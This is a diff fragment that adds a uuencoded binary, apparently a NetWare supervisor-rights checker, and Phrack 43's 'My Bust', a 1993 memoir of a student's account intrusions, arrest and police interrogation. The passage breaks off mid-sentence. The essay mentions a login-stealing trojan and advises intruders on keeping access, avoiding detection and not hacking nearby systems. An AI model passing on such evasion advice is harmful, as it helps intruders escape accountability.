+M '4. T8($U8*>2BX !;YZS:)5OZ)1OR+T;@"0LTA T8($U8*>0V+3OZ+5ORX
+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
+MQ 1=4,5V!HS8"\9T H@\Q78*C-@+QG0"B!S%=@Z,V O&= *)#,5V$HS8"\9T
+M HD46+0 7A]?7<L 58OL_W84_W82_W80_W8._W8,_W8*_W8(_W8&N$$ 4)H&
+M /P!B^5=RU6+[/]V%/]V$O]V$/]V#O]V#/]V"O]V"/]V!KA" %":!@#\ 8OE
+M7<M5B^S_=A3_=A+_=A#_=@[_=@S_=@K_=@C_=@:X0P!0F@8 _ &+Y5W+    
+M %=6N !ZS2\\_W40+HD^#  NC 8. +  M #K!+#PM !>7\M5B^R#[$;&1OX6
+MBD8&B$;_QT;\ @#'1KP^ (U&O!90C4;\%E"PXU":#@#Z 8/$"HE&N@O =7*+
+M1A(+1A!T&/]VP/]VOIH*  P"@\0$Q%X0)HD')HE7 HM&#@M&#'01_W;"F@T 
+M#0*#Q +$7@PFB0>+1@H+1@AT$XU&Q!90_W8*_W8(FH@:%P"#Q B+1A8+1A1T
+M%+@' %"-1O064/]V%O]V%)HR&Q< *\"+Y5W+58OL'E97BF8&Q78(Q'X,S2&T
+M %]>'UW+58OL@>R$ %:*1@:(1HC_=@R:#0 - H/$ HE&B?]V"O]V")J^&A< 
+M@\0$B89^__]V$/]V#IJ^&A< @\0$B4:$_W84_W82FKX:%P"#Q 2)1OZ*AG[_
+MB$:+_[9^__]V"O]V"(U&C!90FC(;%P"#Q J*1H2+MG[_@\8&B$*&_W:$_W80
+M_W8.C4*'%E":,AL7 (/$"O]V%IH-  T"@\0"BW:$ [9^_X/&!XU:AHD'BD;^
+M1D:(0H:-1 &)1H+_=O[_=A3_=A*+\(U"AA90FC(;%P"#Q J+1OX#1H0#AG[_
+M!0@ B4:&QT:   "-1H 64(U&AA90L.-0F@X ^@&#Q J)AGS_7HOE7<M5B^R+
+M7@B&WXM&!H;$B]"+PUW+58OLBT8&AL1=RP                          
+M                                                            
+M                                          !-4R!2=6XM5&EM92!,
+M:6)R87)Y("T@0V]P>7)I9VAT("AC*2 Q.3@X+"!-:6-R;W-O9G0@0V]R<!$ 
+M"BTM+0 *4W5P97)V:7-O<B!#:&5C:V5R(%8Q+C  "BA#*2TQ.3DR(%9A;F1E
+M<F%A<G0@4')O9'5K=&EE<R!"5@ *+2TM  I3=7!E<G9I<V]R($5Q=6EV86QE
+M;F-Y($QO9V=E9"!);B!5<V5R<SH* %-54$525DE33U( 4T5#55))5%E?15%5
+M04Q3 " @(" M("5S"@ @(" @+2!.;V)O9'D* "TM+0!%<G)O<CH@3D546"!I
+M<R!N:65T(&=E;&%D96XN+BX* $5R<F]R.B!)4%@@:7,@;FEE="!G96QA9&5N
+M+BXN"@      X0$  !0"                                        
+M                                                            
+M "X!.T-?1DE,15])3D9/                                   4 (&!
+M@0$!                                 ,H!% )#                
+M /____] #0      %@("& T)# P,!P@6%O\2#1("_P                  
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                            
+M                                                    ^ $4 @  
+M^ $4 @$               (!              ("             (0#    
+M          ($                                                
+M                                                            
+M                                                            
+M                                                            
+M             0   @                                          
+M                                                            
+M                                                    W @4 BAN
+M=6QL*0 H;G5L;"D *RT@(P                         @     (P"%P",
+M A< C (7 (P"%P", A<       $!                  #L!1< #P(/ @\"
+M#P(4 CP\3DU31SX^  !2-C P, T*+2!S=&%C:R!O=F5R9FQO=PT*  , 4C8P
+M,#,-"BT@:6YT96=E<B!D:79I9&4@8GD@, T*  D 4C8P,#D-"BT@;F]T(&5N
+M;W5G:"!S<&%C92!F;W(@96YV:7)O;FUE;G0-"@#\  T* /\ <G5N+71I;64@
+M97)R;W(@  ( 4C8P,#(-"BT@9FQO871I;F<@<&]I;G0@;F]T(&QO861E9 T*
+I  $ 4C8P,#$-"BT@;G5L;"!P;VEN=&5R(&%S<VEG;FUE;G0-"@#___]E
+ 
+end
+
diff --git a/phrack43/12.txt b/phrack43/12.txt
new file mode 100644
index 0000000..975ca6e
--- /dev/null
+++ b/phrack43/12.txt
@@ -0,0 +1,1097 @@
+                              ==Phrack Magazine==
+
+                 Volume Four, Issue Forty-Three, File 12 of 27
+
+
+                                  My Bust
+                                    Or,
+                          An Odyssey of Ignorance
+
+                        (C) 1993 Robert W. F. Clark
+
+
+[This is a factual account; however, certain innocent parties have
+ already suffered enough damage to their reputations
+ without further identification.  I have changed their names.
+ Where I have done so I follow the name with an asterisk [*].
+
+
+I.  _In flagrante delicto_
+
+I am writing this article for the benefit of those who have yet to
+become acquainted with the brotherhood of law enforcement, a subculture
+as warped and depraved as any criminal organization.
+
+The law enforcement community entered my life in the early part of
+December 1989.  I am yet to be quit of it.  My initial contact with law
+enforcement and its quaint customs was one afternoon as I was reading email.
+Suddenly, without warning, I heard a voice shout:  "Freeze, and get away from
+the computer."  Nonplussed, but still with some command of my faculties, I
+drawled:  "So, which do you want me to do?"
+
+The police officer did not answer.
+
+I was in the main public academic computing facility at Penn State,
+which was occupied by several startled-looking computer users, who now trained
+their eyes on the ensuing drama with all the solicitous concern of Romans
+attending an arena event.
+
+The officer, Police Services Officer Anne Rego, then left the room,
+and my immediate concern was to kill all processes and
+delete all incriminating files, or at least to arrange an accidental
+disruption of power.  However, before I could do anything, Miss Rego
+reappeared with a grim, mustached police officer and what appeared to be the
+cast of Revenge of the Nerds.
+
+Angela Thomas, computer science instructor, immediately commandeered
+both terminals I had been using and began transferring the contents of
+all directories to a safe machine; the newcomer, Police Services Officer
+Sam Ricciotti, volunteered the helpful information:  "You're in big
+trouble, kid."
+
+In an excess of hospitality, they then offered me a ride to Grange
+Building, police headquarters of Penn State, for an afternoon of
+conversation and bright lights.
+
+I asked if I were under arrest, and finding that I was not, asked
+what would happen if I refused their generous offer.  They said that
+it might have negative repercussions, and that the wise choice was to
+accompany them.
+
+So, after a moment of thought, I agreed to accompany them.  Forming a
+strange procession, with a police officer preceding me and another
+following, we entered an elevator.  Then, still in formation, we exited
+the building to be greeted by two police cars with flashing red and
+blue lights.  Like a chauffeur, Officer Ricciotti opened the door for
+me, and it was only after he closed it that I realized, for the first
+time, that the back doors of police cars have no handles on the inside.
+
+I had made yet another mistake in a long series.
+
+The purpose of this article is to detail several possible mistakes in dealing
+with police and how they may be avoided.  As I made almost every possible
+mistake, my experience should prove enlightening.
+
+While I hope that this article might prevent you from being busted,
+I will have been successful if even one person does not make the
+mistakes I made when I was busted.
+
+II.  Prelude
+
+To provide the reader with context, I shall explain the series of events
+which culminated in my apprehension.
+
+On my entrance to the Pennsylvania State University as a University
+Scholar, the highest distinction available from an institution remarkable for
+its lack of distinction, I received an account on PSUVM, an IBM 3090 running
+VM/CMS.  Before receiving the account, I acquired all available documentation
+from the Information Desk and read it.  As it happened, the first document I
+read concerned "Netnews," the local name for Usenet.
+
+As soon as my account was activated, I immediately typed netnews.
+I have never been the same since.  Within a week, I began posting
+articles of my own and was immediately lambasted, flamed and roasted
+to a crisp.  Discovering my own talent in the area of malediction,
+I became an alt.flame and talk.bizarre regular.  I also read comp.risks,
+comp.dcom.telecom and other technical journals assiduously.
+
+I began hacking VM/CMS, independently discovering a vast
+number of flaws in the system.  Within a few months, I was able to
+access any information in the system which interested me, submit
+anonymous batch jobs, and circumvent the 'ration' utility which limited
+a luser's time on the system.  It was a trivial matter to write a trojan
+horse which imitated the login screen and grabbed passwords.  Late
+at night, when there were few users, I would crank the CPU, of
+a system capable of handling 300 users simultaneously,
+to 100% capacity just for the sake of doing it.  I discovered a
+simple method of crashing the system, but felt no need to do it,
+as I knew that it would work.  To avoid disk space rationing, I
+would store huge files in my virtual punch.  To my credit, lest
+I seem a selfish pig unconcerned with the welfare of
+other users, I limited such exercises to the later hours of the
+night, and eliminated large files when they were no longer useful
+to me.
+
+Like one starved, I glutted myself on information.  To have
+legitimate access to such a system was marvellous.  For a few months,
+I was satisfied with my level of 'power,' that elusive quality which is
+like a drug to those of a certain peculiarity of mind.
+
+However, it was not long before I realized that despite the sheer
+power of the system, the user interface was clumsy,
+unaesthetic and intolerable to anyone desiring to understand
+the machine directly.  The damn thing had a virtual punch
+card system!
+
+I had heard about Unix, and was interested in trying this system.  However,
+without an affiliation with the Computer Science Department, I had no
+way to get Unix access.
+
+Comparative Literature majors apparently should not clutter their heads with
+such useless and destructive nonsense as the Unix operating system,
+just as an Engineering major can only be damaged by such
+mental clutter as the works of Shakespeare; this, in any case, seemed
+to be the only justification for such an arcane, Byzantine
+policy of restricting access to a nearly unlimited resource.
+
+The academic community is addicted to the unhealthy practice of restricting
+information, and its policies are dedicated to the end of turning agile, eager
+young minds into so many identical cogs in the social mill.  Those unable or
+unwilling to become cogs are of no use to this machine, and are dispensable.
+
+Thus, in the latter part of my freshman year, I became increasingly
+frustrated and disillusioned with higher education in general, and
+by the very idea of specialized education in particular.  I stopped
+attending classes, and even skipped tests.  I became increasingly
+nocturnal and increasingly obsessed with Usenet.  Nevertheless, even
+by doing the entire semester's work during finals week, I still
+barely managed to maintain honors status.
+
+The summer restored my spirits greatly.  I experimented
+with LSD for the first time, and found that it allowed me to see
+myself as I truly was, and to come to a certain grudging acceptance of
+myself, to a greater degree than any psychologist had.  I found that I
+preferred marijuana to alcohol, and soon no longer subjected myself to
+prolonged bouts of drinking.
+
+However, I mistook my upturn in spirits for a rejuvenation, when
+it was more likely due to the lack of pressure and hedonism
+of summer.
+
+Near the end of my first year, I met Dale Garrison [*], an
+electronic musician and audio man for WPSX-TV, the university
+public television station.  He also recorded music recitals
+for faculty and visiting luminaries, and thus had access to
+the Electronic Music Lab and all its facilities.
+His friend Shamir Kamchatka [*] had bequeathed him a Unix
+account on the mail hub of the Pennsylvania State University.
+Another friend, Ron Gere [*], a systems operator for the
+Engineering Computer Lab, had created an account for him on
+the departmental VAXcluster following the termination of his
+legitimate account due to a change in policy.  They gave the
+account the cover name of Huang Chang [*] as a sort of joke,
+but this name was remarkably inconspicuous with the preponderance
+of Asian names on the system.  Dale began posting articles under
+this name, as he had no account with his real name, but by a slow
+process, the nom-de-plume became a well-developed and individual
+personality, and the poems, articles and diatribes written
+under this name became quite popular.  Even when we later
+realized the ease with which he could forge articles with his
+actual name, he was disinclined to do so.  The wit and
+intelligence of the assumed identity became so unique to
+that identity that it would have been difficult to shed.
+
+I often used the Unix account, and quickly began to
+understand and appreciate the complexity and organic unity
+of the Internet.
+
+I had no moral qualms about using a computer account with the
+permission of the legitimate owner of the account, any more than
+I would have moral qualms about checking out a book from the
+mathematics library.  A source of information for which my tuition
+and taxes has paid is a source of information which I have every
+right to access.  To deny my access is a crime greater by far
+than for me to claim my rights by nondestructive means.  Any
+university will allow a student of any college to check out a book
+on any subject from the library.
+
+However, myopic university administrations seem to believe that restricting
+access to information, rather than allowing a free exchange of ideas, is the
+purpose of an educational institution.  Every department will have its own
+computer subnetwork, regardless of whether it is sensible or equitable to do
+so.  The stagnation and redundancy we see on the Internet is the inevitable
+result of such an absurd _de facto_ standard.
+
+This policy is by no means limited to computers.  It extends to
+class scheduling, work-study programs, any technical equipment worth
+using, arts training, religious studies, athletic facilities, degree
+requirements, musical instruments, literature and any thing which is
+useful to the mind.  Bean-counters who can neither read a line
+of Baudelaire nor parse a line of C decide what is to be the canned
+curriculum for anyone who chooses a major.  This is the obvious
+outcome in a society where education is so undervalued that
+Education majors have the lowest SAT scores of any degree-level
+students.
+
+So I thought as I saw resources wasted, minds distorted,
+the lives of close friends ruined by the slow, inexorable grinding
+of the vast, impersonal machine known as higher education.  I saw
+professors in computer science tell blatant falsehoods, professors
+in philosophy misquote Nietzsche, professors in English Literature
+hand out typewritten memos rife with grammatical errors.
+I grew entirely disgusted with the mismanagement of higher
+education.  When I discovered that the most intelligent and individual
+people around me were usually not students, I gave up on college
+as a means of self-actualization.
+
+My second year of college was essentially the first repeated,
+except that my frustration with the academic world bloomed into
+nihilism, and my depression into despair.  I no longer even bothered to
+attend most tests, and even skipped finals.  I allowed my paperwork for
+the University Scholars Program to lapse, rather than suffer
+the indignity of ejection for poor academic performance.
+
+Another summer followed, with less cheer than the previous.  Very early in the
+summer, a moron rear-ended my car without even slowing down before slamming
+into me.  My mother and stepfather ejected me from their house, and I moved to
+Indiana to live with my father.  When the insurance money arrived from my
+totalled car, I purchased a cheap vehicle and hit the highway with no
+particular destination in mind.  With a lemming's logic, I turned east instead
+of west on I-70, and returned to State College, Pennsylvania.
+
+At the last moment, I registered for part-time classes.
+
+
+III.  History of a Conflagration
+
+>From the beginning of this semester, I neglected my classes, and
+instead read RFCs and Unix system security manuals.  I began
+experimenting with the communications capabilities of the TCP/IP protocol
+suite, and began to understand more deeply how it was that such a network
+could exist as an organic whole greater than the sum of its parts.
+
+In the interest of experimenting with these interconnections, I
+began to acquire a number of Internet 'guest' accounts.  When possible, I
+would use these to expand my area of access, with the goal of testing the
+speed and reliability of the network; and, I freely admit, for my amusement.
+
+I realized, at the time, that what I was doing was, legally, in
+a gray area; but I did not give moral considerations more than
+a passing thought.  Later, I had leisure to ponder the moral and legal aspects
+of my actions at great length, but at the time I was collecting accounts I
+only considered the technical aspects of what I was doing.
+
+I discovered Richard Stallman's accounts on a variety of computers.
+I used these only for testing mail and packet routing.
+I realized that it would be trivial to use them for malicious
+purposes, but the thought of doing so did not occur to me.  The very
+idea of hacking a computer system implies the desire to outsmart the
+security some unknown person had designed to prevent intrusion; to
+abuse a trust in this manner has all the appeal to a hacker that a
+hunter would find in stalking a kitten with a howitzer.  To hack an
+open system requires no intelligence and little knowledge, and
+imparts no deeper knowledge than is available by legitimate use of
+the system.
+
+I soon had a collection of accounts widely scattered around
+the continent:  at the University of Chicago, at the Pennsylvania
+State University, at Johns Hopkins, at Lawrence-Berkeley Laboratories
+and a number of commercial and government sites.
+
+However, the deadly mistake of hacking close to home was my downfall.
+I thought I was untouchable and infallible, and in a regrettable accident I
+destroyed the /etc/groups file at the Software Engineering Laboratory at Penn
+State, due to a serious lapse in judgment combined with a series of
+typographical errors.  This is the only action for which I should have been
+held accountable; however, as you shall see, it is the only action for which
+I was not penalized in any way.
+
+I halt the narrative here to deliver some advice suggested by my
+mistakes.
+
+My first piece of advice is:  avoid the destruction of information by not
+altering any information beyond that necessary to maintain
+access and avoid detection.  Try to protect yourself from typographical
+errors by backing up information.  My lack of consideration in this
+important regard cost Professor Dhamir Mannai many hours
+reconstructing the groups file.  Dhamir plays a major role in the
+ensuing fracas, and turned out very sympathetic.  I must
+emphasize that the computer security people with whom we have such
+fun are often decent people.  Treat a system you have invaded as
+you would wish someone to treat your system if they had done the
+same to you.  Protect both the system and yourself.  Damage to the system
+will have a significant effect on any criminal case which is filed
+against you.  Even the harshest of judges is likely to respond to a
+criminal case with a bewildered dismissal if no damage is alleged.
+However, if there is any damage to a system, the police will most certainly
+allege that you maliciously damaged the machine.  It is their job
+to do so.
+
+My second piece of advice is:  avoid hacking systems geographically
+local to you, even by piggybacking multiple connections across the
+country and back to mask your actions.  In any area there is a limited
+number of people both capable of and motivated to hack.
+When the local security gurus hear that a hacker is on the loose,
+they will immediately check their mental list of people who fit the
+profile.  They are in an excellent position to monitor their own network.
+Expect them to do so.
+
+I now return to my narrative.
+
+Almost simultaneous with my activities, the Computer Emergency Response
+Team was formed in the wake of the Morris Worm, and was met with an
+almost palpable lack of computer crime worth prosecuting.
+They began issuing grimly-worded advisories about the ghastly horrors
+lurking about the Internet, and warned of such dangerous events as
+the WANK (Worms Against Nuclear Killers) worm,  which displayed
+an anti-nuclear message when a user logged on to an infected
+machine.
+
+To read the newspaper article concerning Dale and me, a person who
+collects guest accounts is, if not Public Enemy Number One, at least
+a major felon who can only be thwarted by the combined efforts of
+a major university's police division, two computer science departments,
+and Air Force Intelligence, which directly funds CERT.
+
+Matt Crawford, at the University of Chicago, notified CERT of my
+intrusions into their computer systems.  The slow machinery
+of justice began to creak laboriously into motion.  As I had
+taken very few precautions, they found me within two weeks.
+
+As it happens, both the Penn State and University of Chicago
+systems managers had publicly boasted about the impenetrability of
+their systems, and perhaps this contributed to their rancor at discovering
+that the nefarious computer criminal they had apprehended was a
+Comparative Literature major who had failed his only computer science
+course.
+
+
+IV.  In the Belly of the Beast
+
+When we arrived at the police station, the police left me in a room
+alone for approximately half an hour.  My first response was to check
+the door of the room.  It was unlocked.  I checked the barred
+window, which was locked, but could be an escape if necessary.
+Then, with nothing to do, I considered my options.  I considered
+getting up and leaving, and saying that I had nothing to discuss
+with them.  This was a sensible option at the outset, I thought,
+but certainly not sensible now.  This was a repetition of
+a mistake; I could have stopped talking to them at any time.
+
+Finally, I assumed the lotus position on the table in order to collect my
+thoughts.  When I had almost collected my thoughts, Anne Rego and Sam
+Ricciotti returned to the room, accompanied by two men I took to be criminals
+at first glance:  a scruffy, corpulent, bearded man I mentally tagged as a
+public indecency charge; and a young man with the pale and flaccid ill-health
+of a veal calf, perhaps a shoplifter.  However, the pair was Professor Robert
+Owens of the computer science department and Daniel Ehrlich, Owens' student
+flunky.
+
+Professor Owens sent Ehrlich out of the room on some trivial
+errand.  Ricciotti began the grilling.  First, he requested
+that I sign a document waiving my Miranda rights.  He explained that it
+was as much for my benefit as for theirs.  I laughed out loud.  However,
+I thought that as I had done nothing wrong, I should have no fear of
+talking to them, and I signed the fatal document.
+
+I assumed that what I was going to say would be taken at
+face value, and that my innocence was invulnerable armor.
+Certainly I had made a mistake, but this could be explained, could it
+not?  Despite my avowed radical politics, my fear of authority was
+surpassed by a trust for apparent sincerity.
+
+As they say, a con's the easiest mark there is.
+
+I readily admitted to collecting guest accounts, as I found nothing
+culpable in using a guest account, my reasoning being that if a public
+building had not only been unlocked, but also a door in that
+building had been clearly marked as for a "Guest," and that door opened
+readily, then no one would have the gall to arrest someone for trespass, even
+if other, untouched parts of the building were marked
+"No Visitors."  Using a 'guest' account is no more computer crime than
+using a restroom in a McDonald's is breaking-and-entering.
+
+Ricciotti continued grilling me, and I gave him further information.
+I fell prey to the temptation to explain to him what he clearly did
+not understand.  If you are ever in a similar circumstance, do not do
+so.  The opaque ignorance of a police officer is, like a well-
+constructed security system, a very tempting challenge to a hacker.
+However, unlike the security system, the ignorance of a police
+officer is uncrackable.
+
+If you attempt to explain the Internet to a police officer investigating
+you for a crime, and the notion of leased WATS lines seems
+a simple place to start, it will be seen as evidence of some vast,
+bizarre conspiracy.  The gleam in the cop's eye is not one of
+comprehension; it is merely the external evidence that a power fantasy
+is running in the cop's brain.  "I," the cop thinks, "will definitely be
+Cop of the Year!  I'm going to find out more about this Internet thing
+and bust the people responsible."
+
+Perhaps you will be lucky or unlucky enough to be busted by a cop
+who has some understanding of technical issues.  Never having been
+busted by a computer-literate cop, I have no opinion as to whether
+this would be preferable.  However, having met more cops than I care to
+remember, I can tell you that the chances are slim that you will meet a cop
+capable of tying shoelaces in the morning.  The chances of meeting a cop
+capable of understanding the Internet are nearly nonexistent.
+
+Apparently, this is changing, but by no means as rapidly
+as the volatile telecommunications scene.  At present, the cop who busts
+you might have a Mac hooked up to NCIC and be able to use it clumsily;
+or may be able to cope with the user interface of a BBS, but don't
+bother trying to explain anything if the cop doesn't understand you.
+
+If the cop understands you, you have no need to explain; if not, you
+are wasting your time.  In either case, you are giving the police the
+rope they need to hang you.
+
+You have nothing to gain by talking to the police.  If you are not under
+arrest, they can do nothing to you if you refuse to speak to them.  If you
+must speak to them, insist on having an attorney present.  As edifying as it
+is to get a first-hand glimpse of the entrenched ignorance of the law-
+enforcement community, this is one area of knowledge where book-learning is
+far preferable to hands-on experience.  Trust me on this one.
+
+If you do hack, do not use your personal computing equipment and
+do not do it from your home.  To do so is to invite them to confiscate every
+electronic item in your house from your telephone to your microwave.  Expert
+witnesses are willing to testify that anything taken could be used for illegal
+purposes, and they will be correct.
+
+Regardless of what they may say, police have no authority to offer
+you anything for your cooperation; they have the power to tell the
+magistrate and judge that you cooperated.  This and fifty cents will
+get you a cup of coffee.
+
+Eventually, the session turned into an informal debate with Professor
+Owens, who showed an uncanny facility for specious argument and
+proof by rephrasing and repeating.  The usual argument ensued,
+and I will encapsulate rather than include it in its entirety.
+
+"If a bike wasn't locked up, would that mean it was right to steal it or
+take it for a joyride?"
+
+"That argument would hold if a computer were a bike; and if the bike
+weren't returned when I was done with it; and if, in fact, the bike
+hadn't been in the same damn place the whole time you assert it was
+stolen."
+
+"How do you justify stealing the private information of others?"
+
+"For one thing, I didn't look at anyone's private information.
+In addition, I find the idea of stealing information so grotesque
+as to be absurd.  By the way, how do you justify working for Penn State, an
+institution that condoned the illegal sale of the Social Security
+Numbers of its students?"
+
+"Do you realize what you did is a crime?"  interjected Ricciotti.
+
+"No, I do not, and after reading this law you've shown me, I still
+do not believe that what I did violates this law.  Beyond that, what
+happened to presumed innocent until proven guilty?"
+
+The discussion continued in a predictable vein for about two hours,
+when we adjourned until the next day.  Sam sternly advised me that as
+this was a criminal investigation in progress, I was not to tell
+anyone anything about it.  So, naturally, I immediately told
+everyone I knew everything I knew about it.
+
+With a rapidly mounting paranoia, I left the grim, cheerless
+interrogation room and walked into the bustle of an autumn day
+at Penn State, feeling strangely separate from the crowd around
+me, as if I had been branded with a scarlet 'H.'
+
+I took a circuitous route, often doubling back on myself, to detect
+tails, and when I was sure I wasn't being followed, I headed straight
+for a phone booth to call the Electronic Music Lab.
+
+The phone on the other end was busy.  This could only mean one thing,
+that Dale was online.  His only crime was that he borrowed an
+account from the legitimate user, and used the Huang account
+at the Engineering Computer Lab, but I realized after my discussion
+with the police that they would certainly not see the matter as
+I did.
+
+I realized that the situation had the possibility to erupt into
+a very ugly legal melee.  Even before Operation Sun-Devil, I realized
+that cops have a fondness for tagging anything a conspiracy
+if they feel it will garner headlines.  I rushed to the Lab.
+
+
+V.  A Desperate Conference
+
+"Get off the computer now!  I've been busted!"
+
+"This had better not be a goddamn joke."
+
+He rapidly disconnected from his session and turned off the computer.
+We began to weigh options.  We tried to figure out the worst thing they
+could do to me.  Shortly, we had a list of possibilities.  The police
+could jail me, which seemed unlikely.  The police could simply forget
+about the whole thing, which seemed very unlikely.  Anything between
+those two poles was possible.  Anything could happen, and as I was
+to find, anything would.  We planned believing that it was only
+I who was in jeopardy.
+
+If you are ever busted, you will witness the remarkable migration
+habits of the fair-weather friend.  People who yesterday had
+nothing better to do than sit around and drink your wine will
+suddenly have pressing duties elsewhere.
+
+If you are lucky, perhaps half a dozen people will consent to speak
+to you.  If you are very lucky, three of them will be willing to be
+seen with you in public.
+
+Very shortly the police would begin going after everyone I knew for no other
+reason than that they knew me.  I was very soon to be given yet another of the
+blessings accorded to those in whom the authorities develop an interest.
+
+I would discover my true friends.
+
+I needed them.
+
+
+VI.  The Second Interrogation
+
+I agreed to come in for a second interview.
+
+At this interview, I was greeted by two new cops.  The first cop,
+with the face of an unsuccessful pugilist, was Jeffery Jones.
+I detested him on sight.
+
+The second, older cop, with brown hair and a mustache, was Wayne
+Weaver, and had an affable, but stern demeanor, somewhat reminiscent
+of a police officer in a fifties family sitcom.
+
+As witness to this drama, a battered tape recorder sat between us
+on the wooden table.  In my blithe naivete, I once again waived
+my Miranda rights, this time on tape.
+
+The interview began with a deranged series of accusations by Jeffery
+Jones, in which were combined impossibilities, implausibilities,
+inaccuracies and incongruities.  He accused me of everything
+from international espionage to electronic funds transfer.  Shortly
+he exhausted his vocabulary with a particularly difficult
+two-syllable word and lapsed into silence.
+
+Wayne filled the silence with a soft-spoken inquiry, seemingly
+irrelevant to the preceding harangue.  I answered, and we began
+a more sane dialogue.
+
+Jeffery Jones remained mostly silent.  He twiddled his thumbs, studied
+the intricacies of his watch, and investigated the gum stuck under the table.
+Occasionally he would respond to a factual statement by rapidly turning,
+pounding the table with his fists and shouting:  "We know you're lying!"
+
+Finally, after one of Jeffery's outbursts, I offered to terminate the
+interview if this silliness were to continue.  After a brief consultation
+with Wayne, we reached an agreement of sorts and Jeff returned to a dumb,
+stony silence.
+
+I was convinced that Wayne and Jeff were pulling the good cop/bad cop
+routine, having seen the mandatory five thousand hours of cop shows the
+Nielsen people attribute to the average American.  This was, I thought,
+standard Mutt and Jeff.  I was to change my opinion.  This was not good
+cop/bad cop.  It was smart cop/dumb cop.  And, more frighteningly, it
+was no act.
+
+After some more or less idle banter, and a repetition of my previous
+story, and a repetition of my refusal to answer certain other questions,
+the interrogation began to turn ugly.
+
+Frustrated by my refusal to answer, he suddenly announced that he knew
+I was involved in a conspiracy, and made an offer to go easy on me if
+I would tell him who else was involved in the conspiracy.
+
+I refused point-blank, and said that it was despicable of him to
+request that I do any such thing.  He began to apply pressure and
